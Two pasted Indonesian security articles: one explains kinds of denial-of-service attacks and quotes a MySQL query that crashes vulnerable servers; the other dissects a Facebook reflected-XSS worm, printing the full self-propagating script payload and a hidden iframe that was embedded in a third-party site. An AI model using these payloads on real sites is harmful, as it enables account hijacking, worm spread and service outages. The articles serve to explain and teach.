Bagaimana cara serangan DoS ini dilakukan? Serangan ini dilakukan dengan meng-exploit bug/vulnerability pada server. Kata kunci pada vulnerability jenis ini biasanya adalah “specially/carefully crafted packet/request”, yang artinya paket yang dirancang khusus. Kenapa dirancang khusus? Sebab dalam paket itu mengandung  sifat tertentu yang membuat server mati ketika mengolah paket khusus itu.

Mari kita perhatikan beberapa contoh vulnerability yang berakibat pada DoS attack:

• Ping of Death ( CA-1996-26 )

Ini adalah jenis bug yang sudah sangat tua. Praktis sudah tidak ada lagi sistem yang vulnerable terhadap bug ini. Bug ini bila diexploit akan membuat server crash, freeze atau reboot. Serangan ini dilakukan dengan mengirimkan “specially crafted” paket berupa oversized ICMP packet, yaitu paket yang ukurannya di atas normal. Ketika server menerima dan memproses paket yang “aneh” ini, maka server akan crash, freeze atau reboot. Ini adalah contoh serangan DoS “one shot one kill” karena bisa merusak server hanya dengan satu tembakan saja.

• MySQL IF Query DoS ( SA25188 )

Bug ini akan membuat mysql server menjadi crash hanya dengan mengirim sql khusus yang mengandung fungsi IF() contohnya: “SELECT id from example WHERE id IN(1, (SELECT IF(1=0,1,2/0)))”. Ini juga jenis serangan “one shot one kill”.

• Cisco Global Site Selector DNS Request Denial of Service (SA33429)

Bug ini membuat DNS server Cisco mati dengan mengirimkan beberapa “specially crafted” paket request DNS dalam urutan tertentu.

Tiga contoh di atas kiranya cukup memberikan gambaran tentang bagaimana serangan DoS jenis ini dilakukan. Pada intinya adalah attacker memanfaatkan (baca:mengexploit) bug yang membuat server berhenti bekerja dan biasanya dilakukan sendirian secara remote dengan mengirimkan specially crafted packet.

DoS dengan Menyibukkan Server: Make Them As Busy As Possible!

Pada waktu menjelang lebaran kita sering merasa begitu sulit mengirim sms, bahkan sering terjadi gagal kirim. Begitu juga ketika berlangsung acara kuis di TV, mengelpon ke nomor untuk menjawab kuis terasa begitu sulit.  Hal ini terjadi karena ada begitu banyak orang yang mengirim sms pada saat lebaran dan menelpon pada waktu kuis sehingga membuat jaringan telekomunikasi menjadi begitu sibuk sampai tidak bisa melayani pengguna lain. Peristiwa itu mirip dengan yang terjadi ketika sebuah server mendapat serangan denial of service. DoS yang terjadi pada peristiwa tersebut bukan jenis DoS yang mematikan server, namun jenis DoS yang menyibukkan server.

Jenis DoS ini bersifat sementara, server akan kembali normal bila attacker berhenti mengirimkan request yang membuat sibuk server.

DoS jenis ini terbagi lagi menjadi 2 jenis berdasarkan cara melakukan serangan:

• Exploiting vulnerability: Menyerang dengan malicious request/packet
• No vulnerability exploitation: Menyerang dengan normal request/packet

Membuat server sibuk dengan mengexploitasi vulnerability lebih cepat daripada tanpa mengeksploit vulnerability.

Make Server Busy by Exploiting Vulnerability

Dalam serangan DoS jenis ini, attacker memanfatkan bug yang membuat server berlebihan dalam menggunakan resource (cpu,memory,disk space dsb). Attacker akan mencari cara bagaimana agar membuat server bekerja ekstra keras (jauh lebih keras dari request normal) untuk melayani request dia. Biasanya serangan DoS jenis ini tidak berupa serangan “one shot one kill”. Serangan dilakukan dengan melakukan banyak request dengan setiap request membuat server mengonsumsi lebih banyak resource dari request yang normal.

Dalam hitungan matematika sederhana, bila attacker bisa membuat server bekerja selama 10 detik  hanya untuk melayani dia (misal normalnya 0,1 detik), maka attacker bisa mengirimkan request 1.000x untuk membuat server melayani dia selama 10.000 detik (2,7 jam lebih) sehingga membuat pengguna lain tidak bisa menikmati layanan server.

Untuk lebih memahami DoS jenis ini, mari kita lihat contoh-contoh vulnerability yang bisa diexploit untuk melancarkan serangan DoS jenis ini:

• TCP SYN Flood DoS

Ini adalah serangan DoS yang sudah sangat tua. Attacker menyerang dengan cara membanjiri server dengan malicious request berupa paket SYN dengan fake source IP address. SYN packet adalah paket dari client yang mengawali terbentuknya koneksi TCP/IP, setelah itu server akan membalas dengan SYN-ACK, dan dilengkapi dengan paket SYN-ACK-ACK dari client, tiga proses ini disebut three way handshake.

Triknya adalah pada fake source ip address pada paket SYN dari client. Akibatnya server akan mengirim SYN-ACK (step 2) ke ip address yang salah sehingga server juga tidak akan mendapatkan balasan SYN-ACK-ACK dari client. Padahal untuk setiap client yang mencoba membuka koneksi, server akan mengalokasikan resource seperti memori dan waktu untuk menunggu datangnya balasan ACK dari client. Dengan cara ini attacker menghabiskan resource server hanya untuk melayani request palsu dari attacker.

• Apache mod_deflate DoS

Apache menggunakan mod_deflate untuk memampatkan file. Bila visitor meminta sebuah file, maka apache akan menggunakan mod_deflate untuk memampatkannya kemudian mengirimkan ke visitor tersebut. Namun bila di tengah proses pemampatan, visitor memutuskan koneksi TCP, Apache masih terus bekerja memampatkan file untuk visitor yang sebenarnya sudah tidak ada (sudah disconnect). Jadi bugnya adalah pada borosnya pemakaian resource cpu untuk memampatkan file untuk client yang sudah tidak ada.

Attacker memanfaatkan kelemahan ini dengan meminta sebuah file yang berukuran besar, kemudian dalam waktu singkat memutuskan koneksi sehingga membuat server bekerja keras mempatkan file untuk visitor yang sudah tidak ada. Request ini diulang berkali-kali sampai server begitu sibuknya dan semua resource cpu habis.

Dua contoh vulnerability di atas cukup menjelaskan bagaimana serangan DoS jenis ini dilakukan. Pada intinya adalah dengan mengirim banyak malicious request/paket  yang membuat server mengonsumsi resource lebih banyak dan lebih lama untuk setiap requestnya.

Make Server Busy Without Exploiting Vulnerability

Ini adalah jenis serangan yang mengandalkan pada kemampuan mengirimkan normal request sebanyak-banyaknya sehingga server menjadi sibuk. Perbedaan DoS jenis ini dengan DoS yang mengexploit vulnerability adalah pada requestnya. Request yang dikirimkan pada DoS jenis ini adalah request yang normal seperti yang dilakukan pengguna biasa, sehingga server tidak mengonsumsi resource berlebihan. Sedangkan DoS yang mengandalkan vulnerability mengirimkan specially crafted malicious request untuk membuat server mengonsumsi resource lebih banyak untuk melayani malicious request tersebut.

Normal request hanya membuat server mengonsumsi resource dalam jumlah biasa-biasa saja, tidak akan mengganggu kerja server secara keseluruhan. Diperlukan normal request dalam jumlah yang sangat banyak untuk membuat server terganggu kerjanya. Jadi agar serangan ini menjadi efektif, maka serangan harus dilakukan beramai-ramai dari banyak tempat, semakin banyak penyerang semakin bagus hasilnya. Serangan ini juga disebut dengan distributed DoS (DDoS) karena dilakukan dari banyak lokasi yang terdistribusi (tersebar).

Serangan DDoS dilakukan dengan menggunakan komputer zombie atau robot. Zombie adalah komputer yang sudah dikuasai attacker sehingga bisa dikendalikan dari jarak jauh. Sekumpulan komputer zombie membentuk jaringan yang disebut bot-net. Attacker mendapatkan banyak zombie dengan menyebarkan virus atau worm, setiap komputer yang terinfeksi akan diinstall program yang membuat komputer bersedia menjalankan perintah dari attacker.

Gambar di atas menjelaskan cara kerja DDoS. Attacker memberi perintah kepada semua pasukannya untuk membuat request HTTP ke sebuah website. Bila pasukan yang dikuasai attacker sangat besar, maka web server akan dibanjiri request sehingga menjadi terlalu sibuk dan tidak bisa diakses oleh pengguna yang sebenarnya (real visitor).

Serangan jenis ini tidak ada obatnya karena attacker tidak meng-exploit bug atau vulnerability apapun. Bila pada jenis DoS yang lain, serangan dapat dicegah dengan melakukan patching atau update software, maka serangan ini tidak bisa dihentikan dengan update atau patch.

Kesimpulan

Denial of service adalah serangan yang membuat server tidak bisa melayani pengguna yang sesungguhnya. Berikut adalah jenis-jenis serangan DoS berdasarkan cara melakukan serangan:

• Mematikan Server: one shot, one kill untuk membuat server menjadi crash, hang, reboot.
• Menyibukkan Server: mengirim banyak sekali request untuk membuat server sibuk.
  • Exploiting bug: mengirim banyak specially crafted request. Jumlah request tidak sebanyak jenis DoS yang menyibukkan server dengan normal request.
  • Normal request: mengirim banyak request normal seperti pengguna biasa. Diperlukan jumlah request yang lebih banyak dibandingkan jenis DoS yang menyibukkan server dengan exploit bug. Biasanya menggunakan botnet secara terdistribusi.

source: http://www.ilmuhacking.com/web-security/memahami-serangan-denial-of-service/

Mari kita mulai analisa kita dengan mengambil sample satu URL jebakan, yaitu tinyurl.com/sampahh. Ini adalah url versi pendek yang bila diklik akan melakukan redirect ke url aslinya, yaitu:

http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='<script>window.onload=function(){document.forms[0].message.value='jangan salahin w kalo lo bakal ngakak ngeliat ni orang   http://tinyurl.com/sampahh';document.forms[0].submit();}</script>

URL tersebut akan saya pecah menjadi 3 bagian:

• http://m.facebook.com/connect/prompt_feed.php

• ?display=wap&user_message_prompt=

• '<script>window.onload=function(){document.forms[0].message.value='jangan salahin w kalo lo bakal ngakak ngeliat ni orang   http://tinyurl.com/sampahh';document.forms[0].submit();}</script>

Bagian pertama adalah URL untuk update status. Bagian kedua adalah query string parameter yang terdiri dari dua parameter, yaitu display dan user_message_prompt. Bagian ketiga adalah isi dari parameter user_message_prompt yang merupakan payload javascript untuk mengubah status secara otomatis.

The Prompt

Sebelum masuk lebih jauh membahas payloadnya, mari kita lihat dulu bentuk tampilan dari URL untuk mengubah status ini. Gambar ini adalah screenshot ketika browser membuka URL:

http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt=Masukkan Status

Dari gambar di atas kini kita memahami fungsi dari parameter user_message_prompt, yaitu sebagai judul pertanyaan/prompt. Agar user mengerti apa yang harus diinputkan, dalam setiap prompt harus diberi judul yang jelas, contohnya: “Input your PIN”, “Enter your Name”, “Password:” dan sebagainya. Silakan anda mencoba bermain-main dengan mengubah-ubah nilai user_message_prompt sesuka anda di address bar dan perhatikan apa yang terjadi.

Reflected Cross Site Scripting

Normalnya user_message_prompt diisi dengan murni teks saja berupa instruksi/petunjuk apa yang harus diinputkan user. Bila parameter user_message_prompt berisi teks murni saja, maka tidak ada yang perlu dikhawatirkan, namun bagaimana bila parameter tersebut diisi dengan kode HTML atau javascript?

Perhatikan apa yang terjadi bila user_message_prompt diisi dengan kode HTML:

<font color=red><h1>Hello!!</h1></font>

Perhatikan juga apa yang terjadi bila user_message_prompt diisi dengan kode HTML:

<img src="http://1.bp.blogspot.com/_D2J2A4A68T8/TH80zGbHcYI/AAAAAAAAAIw/RXaLXYldrWw/s320/Hacked.jpg"/>

Bagaimana bila user_message_prompt tidak hanya diisi dengan kode HTML, tapi diisi dengan kode javascript? Mari kita coba memasukkan javascript sederhana berikut ini:

<script>prompt("Enter your PIN");</script>

Kita sudah melihat bagaimana user_message_prompt tidak hanya bisa diisi dengan normal teks, namun juga bisa diisi dengan kode HTML dan javascript yang dieksekusi browser. Ini adalah vulnerability yang disebut dengan XSS (Cross Site Scripting), lebih tepatnya reflected-XSS (karena kode yang diinjeksikan dalam URL “dipantulkan” kembali sebagai response HTTP).

The Payload

Dalam contoh sebelumnya kita mencoba memasukkan javascript sederhana yang hanya menampilkan prompt input kepada user. Sebenarnya javascript bisa dipakai untuk melakukan hampir apa saja mulai dari yang sekedar iseng seperti mengubah status, sampai yang serius seperti seperti mencuri cookie korban atau take-over komputer korban dengan mengeksploitasi kelemahan pada browsernya. Hal-hal inilah yang disebut dengan payload. Attacker bebas memasukkan payload apa saja yang dia inginkan seperti mengubah status, mencuri cookie dsb.

Perhatikan kembali isi parameter user_message_prompt yang didapat dari tinyurl.com/sampahh:

user_message_prompt='<script>window.onload=function(){document.forms[0].message.value='jangan salahin w kalo lo bakal ngakak ngeliat ni orang   http://tinyurl.com/sampahh';document.forms[0].submit();}</script>

Bagi pembaca yang jeli tentu merasa aneh, kenapa ada karakter single-quote (‘) sebelum tag script? Perlukah karakter single-quote ini? Jawabannya adalah tidak perlu sama sekali. Saya melihat semua yang membuat url sejenis ini dalam payloadnya selalu ada karakter single-quote di depan tag script. Mungkin pembuatnya hanya ikut-ikutan saja tanpa benar-benar mengerti apa yang terjadi, karena dia mencontoh orang lain memakai single-quote, maka diapun ikut memakai single-quote.

Payload untuk mengubah status sebenarnya sangat sederhana. Berikut ini adalah payload untuk mengubah status di facebook secara otomatis:

Onload adalah event yang terjadi bila suatu halaman web selesai di-load. Baris pertama pada kode di atas artinya meminta browser untuk mengeksekusi sebuah fungsi secara otomatis ketika halaman ini selesai diload. Fungsi yang dimaksud terdiri dari dua baris kode sederhana untuk mengubah nilai textarea message dan melakukan submit form.

Baris kedua dimaksudkan untuk mengubah nilai dari textarea bernama message seperti gambar di bawah ini.

Langkah terakhir adalah memanggil fungsi submit() untuk melakukan submit form. Jadi sangat sederhana cara untuk mengubah status secara otomatis, cukup dua langkah saja, mengisi message dengan isi status, lalu submit, status pun selesai diubah.

Varian Lain dengan IFRAME

Saya juga menemukan varian lain yang memakai iframe. Varian ini lebih berbahaya karena bisa disisipkan dalam web apapun dan bisa dengan mudah melakukan pengubahan status berulang kali. Salah satu teman facebook saya menjadi korban freesmsvoip.com sampai berkali-kali.

Kenapa bisa kena sampai berkali-kali? Mari kita lihat potongan awal source html dari www.freesmsvoip.com.

<iframe id="CrazyDaVinci" style="display:none;" src="http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='<script>window.onload=function(){document.forms[0].message.value='Kirim SMS Gratis Ke Semua Operator di www.freesmsvoip.com Wow.. cool guys! coba gihhh!!!';document.forms[0].submit();}</script>"></iframe>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>SMS Gratis Semua Operator - Kirim SMS Gratis Via Internet - SMS Gratis Online - Widget SMS Gratis</title>
<meta name="description" content="Kirim SMS gratis ke semua operator GSM, CDMA se-Indonesia tanpa bayar lewat internet" />

Perhatikan pada baris pertama ada tag iframe dengan src yang juga mengeksploitasi XSS vulnerability pada m.facebook.com/connect/prompt_feed.php. Tag iframe ini tidak hanya ada pada halaman depan saja, namun pada setiap halaman di web tersebut. Akibatnya bila pengunjung hanya melihat halaman depan saja, dia hanya kena satu kali, bila dia juga berkunjung ke halaman-halaman lain, maka dia akan melakukan update status berkali-kali.

Berbeda dengan kasus yang memakai jasa pemendek url seperti tinyurl.com, serangan memakai iframe bisa dilekatkan pada halaman web yang tampak normal, baik hati dan tidak sombong. Dengan maraknya kasus eksploitasi XSS dengan url-shortener, orang akan semakin curiga bila menerima link yang dipendekkan karena user tidak tahu url itu akan dibelokkan ke mana. Menerima url yang dipendekkan kini mirip dengan menerima paket yang tidak jelas apa isinya, buku atau bom. Namun berbeda kasusnya dengan url yang panjang, orang cenderung tidak curiga bila menerima url panjang, apalagi domainnya tampak seperti situs baik-baik.

source: http://www.ilmuhacking.com/web-security/memahami-teknik-penyebaran-status-berantai-di-facebook/